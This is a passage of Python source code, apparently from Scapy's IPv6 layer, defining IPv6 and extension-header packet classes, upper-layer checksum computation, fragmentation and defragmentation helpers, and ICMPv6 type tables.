"IPv6ExtHdrHopByHop", 4: "IP", 6: "TCP", 17: "UDP", 43: "IPv6ExtHdrRouting", 44: "IPv6ExtHdrFragment", 50: "ESP", 51: "AH", 58: "ICMPv6Unknown", 59: "Raw", 60: "IPv6ExtHdrDestOpt"} class IP6ListField(StrField): __slots__ = ["count_from", "length_from"] islist = 1 def __init__(self, name, default, count_from=None, length_from=None): if default is None: default = [] StrField.__init__(self, name, default) self.count_from = count_from self.length_from = length_from def i2len(self, pkt, i): return 16 * len(i) def i2count(self, pkt, i): if isinstance(i, list): return len(i) return 0 def getfield(self, pkt, s): c = tmp_len = None if self.length_from is not None: tmp_len = self.length_from(pkt) elif self.count_from is not None: c = self.count_from(pkt) lst = [] ret = b"" remain = s if tmp_len is not None: remain, ret = s[:tmp_len], s[tmp_len:] while remain: if c is not None: if c <= 0: break c -= 1 addr = inet_ntop(socket.AF_INET6, remain[:16]) lst.append(addr) remain = remain[16:] return remain + ret, lst def i2m(self, pkt, x): s = b"" for y in x: try: y = inet_pton(socket.AF_INET6, y) except Exception: y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] y = inet_pton(socket.AF_INET6, y) s += y return s def i2repr(self, pkt, x): s = [] if x is None: return "[]" for y in x: s.append('%s' % y) return "[ %s ]" % (", ".join(s)) class _IPv6GuessPayload: name = "Dummy class that implements guess_payload_class() for IPv6" def default_payload_class(self, p): if self.nh == 58: # ICMPv6 t = orb(p[0]) if len(p) > 2 and (t == 139 or t == 140): # Node Info Query return _niquery_guesser(p) if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 if t == 130 and len(p) >= 28: # RFC 3810 - 8.1. Query Version Distinctions return ICMPv6MLQuery2 return icmp6typescls.get(t, Raw) return Raw elif self.nh == 135 and len(p) > 3: # Mobile IPv6 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header return IPv6ExtHdrSegmentRouting return ipv6nhcls.get(self.nh, Raw) class IPv6(_IPv6GuessPayload, Packet, IPTools): name = "IPv6" fields_desc = [BitField("version", 6, 4), BitField("tc", 0, 8), BitField("fl", 0, 20), ShortField("plen", None), ByteEnumField("nh", 59, ipv6nh), ByteField("hlim", 64), SourceIP6Field("src", "dst"), # dst is for src @ selection DestIP6Field("dst", "::1")] def route(self): """Used to select the L2 address""" dst = self.dst if isinstance(dst, Gen): dst = next(iter(dst)) return conf.route6.route(dst) def mysummary(self): return "%s > %s (%i)" % (self.src, self.dst, self.nh) def post_build(self, p, pay): p += pay if self.plen is None: tmp_len = len(p) - 40 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] return p def extract_padding(self, data): """Extract the IPv6 payload""" if self.plen == 0 and self.nh == 0 and len(data) >= 8: # Extract Hop-by-Hop extension length hbh_len = orb(data[1]) hbh_len = 8 + hbh_len * 8 # Extract length from the Jumbogram option # Note: the following algorithm take advantage of the Jumbo option # mandatory alignment (4n + 2, RFC2675 Section 2) jumbo_len = None idx = 0 offset = 4 * idx + 2 while offset <= len(data): opt_type = orb(data[offset]) if opt_type == 0xc2: # Jumbo option jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 break offset = 4 * idx + 2 idx += 1 if jumbo_len is None: log_runtime.info("Scapy did not find a Jumbo option") jumbo_len = 0 tmp_len = hbh_len + jumbo_len else: tmp_len = self.plen return data[:tmp_len], data[tmp_len:] def hashret(self): if self.nh == 58 and isinstance(self.payload, _ICMPv6): if self.payload.type < 128: return self.payload.payload.hashret() elif (self.payload.type in [133, 134, 135, 136, 144, 145]): return struct.pack("B", self.nh) + self.payload.hashret() if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 return self.payload.hashret() nh = self.nh sd = self.dst ss = self.src if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): # With routing header, the destination is the last # address of the IPv6 list if segleft > 0 nh = self.payload.nh try: sd = self.addresses[-1] except IndexError: sd = '::1' # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 # could be anything from the original list ... if 1: sd = inet_pton(socket.AF_INET6, sd) for a in self.addresses: a = inet_pton(socket.AF_INET6, a) sd = strxor(sd, a) sd = inet_ntop(socket.AF_INET6, sd) if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 # With segment routing header (rh == 4), the destination is # the first address of the IPv6 addresses list try: sd = self.addresses[0] except IndexError: sd = self.dst if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): nh = self.payload.nh if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): nh = self.payload.nh if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): foundhao = None for o in self.payload.options: if isinstance(o, HAO): foundhao = o if foundhao: nh = self.payload.nh # XXX what if another extension follows ? ss = foundhao.hoa if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): sd = inet_pton(socket.AF_INET6, sd) ss = inet_pton(socket.AF_INET6, ss) return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 else: return struct.pack("B", nh) + self.payload.hashret() def answers(self, other): if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP if self.nh in [4, 41]: return self.payload.answers(other) if isinstance(other, IPv6) and other.nh in [4, 41]: return self.answers(other.payload) if isinstance(other, IP) and other.proto in [4, 41]: return self.answers(other.payload) if not isinstance(other, IPv6): # self is reply, other is request return False if conf.checkIPaddr: # ss = inet_pton(socket.AF_INET6, self.src) sd = inet_pton(socket.AF_INET6, self.dst) os = inet_pton(socket.AF_INET6, other.src) od = inet_pton(socket.AF_INET6, other.dst) # request was sent to a multicast address (other.dst) # Check reply destination addr matches request source addr (i.e # sd == os) except when reply is multicasted too # XXX test mcast scope matching ? if in6_ismaddr(other.dst): if in6_ismaddr(self.dst): if ((od == sd) or (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 return self.payload.answers(other.payload) return False if (os == sd): return self.payload.answers(other.payload) return False elif (sd != os): # or ss != od): <- removed for ICMP errors return False if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 # ICMPv6 Error message -> generated by IPv6 packet # Note : at the moment, we jump the ICMPv6 specific class # to call answers() method of erroneous packet (over # initial packet). There can be cases where an ICMPv6 error # class could implement a specific answers method that perform # a specific task. Currently, don't see any use ... return self.payload.payload.answers(other) elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): return self.payload.answers(other.payload) elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): return self.payload.answers(other.payload.payload) elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): return self.payload.payload.answers(other.payload.payload) elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 return self.payload.payload.answers(other.payload) else: if (self.nh != other.nh): return False return self.payload.answers(other.payload) class _IPv46(IP): """ This class implements a dispatcher that is used to detect the IP version while parsing Raw IP pcap files. """ @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: if orb(_pkt[0]) >> 4 == 6: return IPv6 elif kargs.get("version") == 6: return IPv6 return IP def inet6_register_l3(l2, l3): return getmacbyip6(l3.dst) conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) class IPerror6(IPv6): name = "IPv6 in ICMPv6" def answers(self, other): if not isinstance(other, IPv6): return False sd = inet_pton(socket.AF_INET6, self.dst) ss = inet_pton(socket.AF_INET6, self.src) od = inet_pton(socket.AF_INET6, other.dst) os = inet_pton(socket.AF_INET6, other.src) # Make sure that the ICMPv6 error is related to the packet scapy sent if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: # find upper layer for self (possible citation) selfup = self.payload while selfup is not None and isinstance(selfup, _IPv6ExtHdr): selfup = selfup.payload # find upper layer for other (initial packet). Also look for RH otherup = other.payload request_has_rh = False while otherup is not None and isinstance(otherup, _IPv6ExtHdr): if isinstance(otherup, IPv6ExtHdrRouting): request_has_rh = True otherup = otherup.payload if ((ss == os and sd == od) or # < Basic case (ss == os and request_has_rh)): # ^ Request has a RH : don't check dst address # Let's deal with possible MSS Clamping if (isinstance(selfup, TCP) and isinstance(otherup, TCP) and selfup.options != otherup.options): # seems clamped # Save fields modified by MSS clamping old_otherup_opts = otherup.options old_otherup_cksum = otherup.chksum old_otherup_dataofs = otherup.dataofs old_selfup_opts = selfup.options old_selfup_cksum = selfup.chksum old_selfup_dataofs = selfup.dataofs # Nullify them otherup.options = [] otherup.chksum = 0 otherup.dataofs = 0 selfup.options = [] selfup.chksum = 0 selfup.dataofs = 0 # Test it and save result s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) res = s1[:tmp_len] == s2[:tmp_len] # recall saved values otherup.options = old_otherup_opts otherup.chksum = old_otherup_cksum otherup.dataofs = old_otherup_dataofs selfup.options = old_selfup_opts selfup.chksum = old_selfup_cksum selfup.dataofs = old_selfup_dataofs return res s1 = raw(selfup) s2 = raw(otherup) tmp_len = min(len(s1), len(s2)) return s1[:tmp_len] == s2[:tmp_len] return False def mysummary(self): return Packet.mysummary(self) ############################################################################# ############################################################################# # Upper Layer Checksum computation # ############################################################################# ############################################################################# class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation name = "Pseudo IPv6 Header" fields_desc = [IP6Field("src", "::"), IP6Field("dst", "::"), ShortField("uplen", None), BitField("zero", 0, 24), ByteField("nh", 0)] def in6_chksum(nh, u, p): """ As Specified in RFC 2460 - 8.1 Upper-Layer Checksums Performs IPv6 Upper Layer checksum computation. This function operates by filling a pseudo header class instance (PseudoIPv6) with: - Next Header value - the address of _final_ destination (if some Routing Header with non segleft field is present in underlayer classes, last address is used.) - the address of _real_ source (basically the source address of an IPv6 class instance available in the underlayer or the source address in HAO option if some Destination Option header found in underlayer includes this option). - the length is the length of provided payload string ('p') :param nh: value of upper layer protocol :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be provided with all under layers (IPv6 and all extension headers, for example) :param p: the payload of the upper layer provided as a string """ ph6 = PseudoIPv6() ph6.nh = nh rthdr = 0 hahdr = 0 final_dest_addr_found = 0 while u is not None and not isinstance(u, IPv6): if (isinstance(u, IPv6ExtHdrRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[-1] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and u.segleft != 0 and len(u.addresses) != 0 and final_dest_addr_found == 0): rthdr = u.addresses[0] final_dest_addr_found = 1 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and isinstance(u.options[0], HAO)): hahdr = u.options[0].hoa u = u.underlayer if u is None: warning("No IPv6 underlayer to compute checksum. Leaving null.") return 0 if hahdr: ph6.src = hahdr else: ph6.src = u.src if rthdr: ph6.dst = rthdr else: ph6.dst = u.dst ph6.uplen = len(p) ph6s = raw(ph6) return checksum(ph6s + p) ############################################################################# ############################################################################# # Extension Headers # ############################################################################# ############################################################################# # Inherited by all extension header classes class _IPv6ExtHdr(_IPv6GuessPayload, Packet): name = 'Abstract IPv6 Option Header' aliastypes = [IPv6, IPerror6] # TODO ... # IPv6 options for Extension Headers # _hbhopts = {0x00: "Pad1", 0x01: "PadN", 0x04: "Tunnel Encapsulation Limit", 0x05: "Router Alert", 0x06: "Quick-Start", 0xc2: "Jumbo Payload", 0xc9: "Home Address Option"} class _OTypeField(ByteEnumField): """ Modified BytEnumField that displays information regarding the IPv6 option based on its option type value (What should be done by nodes that process the option if they do not understand it ...) It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options """ pol = {0x00: "00: skip", 0x40: "01: discard", 0x80: "10: discard+ICMP", 0xC0: "11: discard+ICMP not mcast"} enroutechange = {0x00: "0: Don't change en-route", 0x20: "1: May change en-route"} def i2repr(self, pkt, x): s = self.i2s.get(x, repr(x)) polstr = self.pol[(x & 0xC0)] enroutechangestr = self.enroutechange[(x & 0x20)] return "%s [%s, %s]" % (s, polstr, enroutechangestr) class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option name = "Scapy6 Unknown Option" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # By default, no alignment requirement """ As specified in section 4.2 of RFC 2460, every options has an alignment requirement usually expressed xn+y, meaning the Option Type must appear at an integer multiple of x octets from the start of the header, plus y octets. That function is provided the current position from the start of the header and returns required padding length. """ return 0 @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in _hbhoptcls: return _hbhoptcls[o] return cls def extract_padding(self, p): return b"", p class Pad1(Packet): # IPv6 Hop-By-Hop Option name = "Pad1" fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class PadN(Packet): # IPv6 Hop-By-Hop Option name = "PadN" fields_desc = [_OTypeField("otype", 0x01, _hbhopts), FieldLenField("optlen", None, length_of="optdata", fmt="B"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] def alignment_delta(self, curpos): # No alignment requirement return 0 def extract_padding(self, p): return b"", p class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option name = "Router Alert" fields_desc = [_OTypeField("otype", 0x05, _hbhopts), ByteField("optlen", 2), ShortEnumField("value", None, {0: "Datagram contains a MLD message", 1: "Datagram contains RSVP message", 2: "Datagram contains an Active Network message", # noqa: E501 68: "NSIS NATFW NSLP", 69: "MPLS OAM", 65535: "Reserved"})] # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml def alignment_delta(self, curpos): # alignment requirement : 2n+0 x = 2 y = 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class Jumbo(Packet): # IPv6 Hop-By-Hop Option name = "Jumbo Payload" fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), ByteField("optlen", 4), IntField("jumboplen", None)] def alignment_delta(self, curpos): # alignment requirement : 4n+2 x = 4 y = 2 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class HAO(Packet): # IPv6 Destination Options Header Option name = "Home Address Option" fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), ByteField("optlen", 16), IP6Field("hoa", "::")] def alignment_delta(self, curpos): # alignment requirement : 8n+6 x = 8 y = 6 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p _hbhoptcls = {0x00: Pad1, 0x01: PadN, 0x05: RouterAlert, 0xC2: Jumbo, 0xC9: HAO} # Hop-by-Hop Extension Header # class _OptionsField(PacketListField): __slots__ = ["curpos"] def __init__(self, name, default, cls, curpos, *args, **kargs): self.curpos = curpos PacketListField.__init__(self, name, default, cls, *args, **kargs) def i2len(self, pkt, i): return len(self.i2m(pkt, i)) def i2m(self, pkt, x): autopad = None try: autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field except Exception: autopad = 1 if not autopad: return b"".join(map(str, x)) curpos = self.curpos s = b"" for p in x: d = p.alignment_delta(curpos) curpos += d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 2))) pstr = raw(p) curpos += len(pstr) s += pstr # Let's make the class including our option field # a multiple of 8 octets long d = curpos % 8 if d == 0: return s d = 8 - d if d == 1: s += raw(Pad1()) elif d != 0: s += raw(PadN(optdata=b'\x00' * (d - 2))) return s def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) class _PhantomAutoPadField(ByteField): def addfield(self, pkt, s, val): return s def getfield(self, pkt, s): return s, 1 def i2repr(self, pkt, x): if x: return "On" return "Off" class IPv6ExtHdrHopByHop(_IPv6ExtHdr): name = "IPv6 Extension Header - Hop-by-Hop Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 0}} # Destination Option Header # class IPv6ExtHdrDestOpt(_IPv6ExtHdr): name = "IPv6 Extension Header - Destination Options Header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, length_of="options", fmt="B", adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], HBHOptUnknown, 2, length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 overload_fields = {IPv6: {"nh": 60}} # Routing Header # class IPv6ExtHdrRouting(_IPv6ExtHdr): name = "IPv6 Option Header Routing" fields_desc = [ByteEnumField("nh", 59, ipv6nh), FieldLenField("len", None, count_of="addresses", fmt="B", adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 ByteField("type", 0), ByteField("segleft", None), BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 IP6ListField("addresses", [], length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.segleft is None: pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Segment Routing Header # # This implementation is based on draft 06, available at: # https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 class IPv6ExtHdrSegmentRoutingTLV(Packet): name = "IPv6 Option Header Segment Routing - Generic TLV" fields_desc = [ByteField("type", 0), ByteField("len", 0), ByteField("reserved", 0), ByteField("flags", 0), StrLenField("value", "", length_from=lambda pkt: pkt.len)] def extract_padding(self, p): return b"", p registered_sr_tlv = {} @classmethod def register_variant(cls): cls.registered_sr_tlv[cls.type.default] = cls @classmethod def dispatch_hook(cls, pkt=None, *args, **kargs): if pkt: tmp_type = orb(pkt[0]) return cls.registered_sr_tlv.get(tmp_type, cls) return cls class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Ingress Node TLV" fields_desc = [ByteField("type", 1), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("ingress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Egress Node TLV" fields_desc = [ByteField("type", 2), ByteField("len", 18), ByteField("reserved", 0), ByteField("flags", 0), IP6Field("egress_node", "::1")] class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV): name = "IPv6 Option Header Segment Routing - Padding TLV" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="padding", fmt="B"), StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): name = "IPv6 Option Header Segment Routing" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteField("type", 4), ByteField("segleft", None), ByteField("lastentry", None), BitField("unused1", 0, 1), BitField("protected", 0, 1), BitField("oam", 0, 1), BitField("alert", 0, 1), BitField("hmac", 0, 1), BitField("unused2", 0, 3), ShortField("tag", 0), IP6ListField("addresses", ["::1"], count_from=lambda pkt: (pkt.lastentry + 1)), PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV, length_from=lambda pkt: 8 * pkt.len - 16 * ( pkt.lastentry + 1 ))] overload_fields = {IPv6: {"nh": 43}} def post_build(self, pkt, pay): if self.len is None: # The extension must be align on 8 bytes tmp_mod = (len(pkt) - 8) % 8 if tmp_mod == 1: warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte!") elif tmp_mod >= 2: # Add the padding extension tmp_pad = b"\x00" * (tmp_mod - 2) tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad) pkt += raw(tlv) tmp_len = (len(pkt) - 8) // 8 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] if self.segleft is None: tmp_len = len(self.addresses) if tmp_len: tmp_len -= 1 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] if self.lastentry is None: lastentry = len(self.addresses) if lastentry == 0: warning( "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" ) else: lastentry -= 1 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] return _IPv6ExtHdr.post_build(self, pkt, pay) # Fragmentation Header # class IPv6ExtHdrFragment(_IPv6ExtHdr): name = "IPv6 Extension Header - Fragmentation header" fields_desc = [ByteEnumField("nh", 59, ipv6nh), BitField("res1", 0, 8), BitField("offset", 0, 13), BitField("res2", 0, 2), BitField("m", 0, 1), IntField("id", None)] overload_fields = {IPv6: {"nh": 44}} def guess_payload_class(self, p): if self.offset > 0: return Raw else: return super(IPv6ExtHdrFragment, self).guess_payload_class(p) def defragment6(packets): """ Performs defragmentation of a list of IPv6 packets. Packets are reordered. Crap is dropped. What lacks is completed by 'X' characters. """ # Remove non fragments lst = [x for x in packets if IPv6ExtHdrFragment in x] if not lst: return [] id = lst[0][IPv6ExtHdrFragment].id llen = len(lst) lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] if len(lst) != llen: warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 # reorder fragments res = [] while lst: min_pos = 0 min_offset = lst[0][IPv6ExtHdrFragment].offset for p in lst: cur_offset = p[IPv6ExtHdrFragment].offset if cur_offset < min_offset: min_pos = 0 min_offset = cur_offset res.append(lst[min_pos]) del(lst[min_pos]) # regenerate the fragmentable part fragmentable = b"" for p in res: q = p[IPv6ExtHdrFragment] offset = 8 * q.offset if offset != len(fragmentable): warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 fragmentable += b"X" * (offset - len(fragmentable)) fragmentable += raw(q.payload) # Regenerate the unfragmentable part. q = res[0].copy() nh = q[IPv6ExtHdrFragment].nh q[IPv6ExtHdrFragment].underlayer.nh = nh q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) del q[IPv6ExtHdrFragment].underlayer.payload q /= conf.raw_layer(load=fragmentable) del(q.plen) if q[IPv6].underlayer: q[IPv6] = IPv6(raw(q[IPv6])) else: q = IPv6(raw(q)) return q def fragment6(pkt, fragSize): """ Performs fragmentation of an IPv6 packet. 'fragSize' argument is the expected maximum size of fragment data (MTU). The list of packets is returned. If packet does not contain an IPv6ExtHdrFragment class, it is added to first IPv6 layer found. If no IPv6 layer exists packet is returned in result list unmodified. """ pkt = pkt.copy() if IPv6ExtHdrFragment not in pkt: if IPv6 not in pkt: return [pkt] layer3 = pkt[IPv6] data = layer3.payload frag = IPv6ExtHdrFragment(nh=layer3.nh) layer3.remove_payload() del(layer3.nh) del(layer3.plen) frag.add_payload(data) layer3.add_payload(frag) # If the payload is bigger than 65535, a Jumbo payload must be used, as # an IPv6 packet can't be bigger than 65535 bytes. if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 return [] s = raw(pkt) # for instantiation to get upper layer checksum right if len(s) <= fragSize: return [pkt] # Fragmentable part : fake IPv6 for Fragmentable part length computation fragPart = pkt[IPv6ExtHdrFragment].payload tmp = raw(IPv6(src="::1", dst="::1") / fragPart) fragPartLen = len(tmp) - 40 # basic IPv6 header length fragPartStr = s[-fragPartLen:] # Grab Next Header for use in Fragment Header nh = pkt[IPv6ExtHdrFragment].nh # Keep fragment header fragHeader = pkt[IPv6ExtHdrFragment] del fragHeader.payload # detach payload # Unfragmentable Part unfragPartLen = len(s) - fragPartLen - 8 unfragPart = pkt del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload # Cut the fragmentable part to fit fragSize. Inner fragments have # a length that is an integer multiple of 8 octets. last Frag MTU # can be anything below MTU lastFragSize = fragSize - unfragPartLen - 8 innerFragSize = lastFragSize - (lastFragSize % 8) if lastFragSize <= 0 or innerFragSize == 0: warning("Provided fragment size value is too low. " + "Should be more than %d" % (unfragPartLen + 8)) return [unfragPart / fragHeader / fragPart] remain = fragPartStr res = [] fragOffset = 0 # offset, incremeted during creation fragId = random.randint(0, 0xffffffff) # random id ... if fragHeader.id is not None: # ... except id provided by user fragId = fragHeader.id fragHeader.m = 1 fragHeader.id = fragId fragHeader.nh = nh # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... while True: if (len(remain) > lastFragSize): tmp = remain[:innerFragSize] remain = remain[innerFragSize:] fragHeader.offset = fragOffset # update offset fragOffset += (innerFragSize // 8) # compute new one if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) res.append(tempo) else: fragHeader.offset = fragOffset # update offSet fragHeader.m = 0 if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) res.append(tempo) break return res ############################################################################# ############################################################################# # ICMPv6* Classes # ############################################################################# ############################################################################# icmp6typescls = {1: "ICMPv6DestUnreach", 2: "ICMPv6PacketTooBig", 3: "ICMPv6TimeExceeded", 4: "ICMPv6ParamProblem", 128: "ICMPv6EchoRequest", 129: "ICMPv6EchoReply", 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 131: "ICMPv6MLReport", 132: "ICMPv6MLDone", 133: "ICMPv6ND_RS", 134: "ICMPv6ND_RA", 135: "ICMPv6ND_NS", 136: "ICMPv6ND_NA", 137: "ICMPv6ND_Redirect", # 138: Do Me - RFC 2894 - Seems painful 139: "ICMPv6NIQuery", 140: "ICMPv6NIReply", 141: "ICMPv6ND_INDSol", 142: "ICMPv6ND_INDAdv", 143: "ICMPv6MLReport2", 144: "ICMPv6HAADRequest", 145: "ICMPv6HAADReply", 146: "ICMPv6MPSol", 147: "ICMPv6MPAdv", # 148: Do Me - SEND related - RFC 3971 # 149: Do Me - SEND related - RFC 3971 151: "ICMPv6MRD_Advertisement", 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", # 154: Do Me - FMIPv6 Messages - RFC 5568 155: "ICMPv6RPL", # RFC 6550 } icmp6typesminhdrlen = {1: 8, 2: 8, 3: 8, 4: 8, 128: 8, 129: 8, 130: 24, 131: 24, 132: 24, 133: 8, 134: 16, 135: 24, 136: 24, 137: 40, # 139: # 140 141: 8, 142: 8, 143: 8, 144: 8, 145: 8, 146: 8, 147: 8, 151: 8, 152: 4, 153: 4, 155: 4 } icmp6types = {1: "Destination unreachable", 2: "Packet too big", 3: "Time exceeded", 4: "Parameter problem", 100: "Private Experimentation", 101: "Private Experimentation", 128: "Echo Request", 129: "Echo Reply", 130: "MLD Query", 131: "MLD Report", 132: "MLD Done", 133: "Router Solicitation", 134: "Router Advertisement", 135: "Neighbor Solicitation", 136: "Neighbor Advertisement", 137: "Redirect Message", 138: "Router Renumbering", 139: "ICMP Node Information Query", 140: "ICMP Node Information Response", 141: "Inverse Neighbor Discovery Solicitation Message", 142: "Inverse Neighbor Discovery Advertisement Message", 143: "MLD Report Version 2", 144: "Home Agent Address Discovery Request Message", 145: "Home Agent Address Discovery Reply Message", 146: "Mobile Prefix Solicitation", 147: "Mobile Prefix Advertisement", 148: "Certification Path Solicitation", 149: "Certification Path Advertisement", 151: "Multicast Router Advertisement", 152: "Multicast Router Solicitation", 153: "Multicast Router Termination", 155: "RPL Control Message", 200: "Private Experimentation", 201: "Private Experimentation"} class _ICMPv6(Packet): name = "ICMPv6 dummy class" overload_fields = {IPv6: {"nh": 58}} def post_build(self, p, pay): p += pay if self.cksum is None: chksum = in6_chksum(58, self.underlayer, p) p = p[:2] + struct.pack("!H", chksum) + p[4:] return p def hashret(self): return self.payload.hashret() def answers(self, other): # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... if (isinstance(self.underlayer, IPerror6) or isinstance(self.underlayer, _IPv6ExtHdr) and isinstance(other, _ICMPv6)): if not ((self.type == other.type) and (self.code == other.code)): return 0 return 1 return 0 class _ICMPv6Error(_ICMPv6): name = "ICMPv6 errors dummy class" def guess_payload_class(self, p): return IPerror6 class ICMPv6Unknown(_ICMPv6): name = "Scapy6 ICMPv6 fallback class" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteField("code", 0), XShortField("cksum", None), StrField("msgbody", "")] # RFC 2460 # class ICMPv6DestUnreach(_ICMPv6Error): name = "ICMPv6 Destination Unreachable" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteEnumField("code", 0, {0: "No route to destination", 1: "Communication with destination administratively prohibited", # noqa: E501 2: "Beyond scope of source address", # noqa: E501 3: "Address unreachable", 4: "Port unreachable"}), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] class ICMPv6PacketTooBig(_ICMPv6Error): name = "ICMPv6 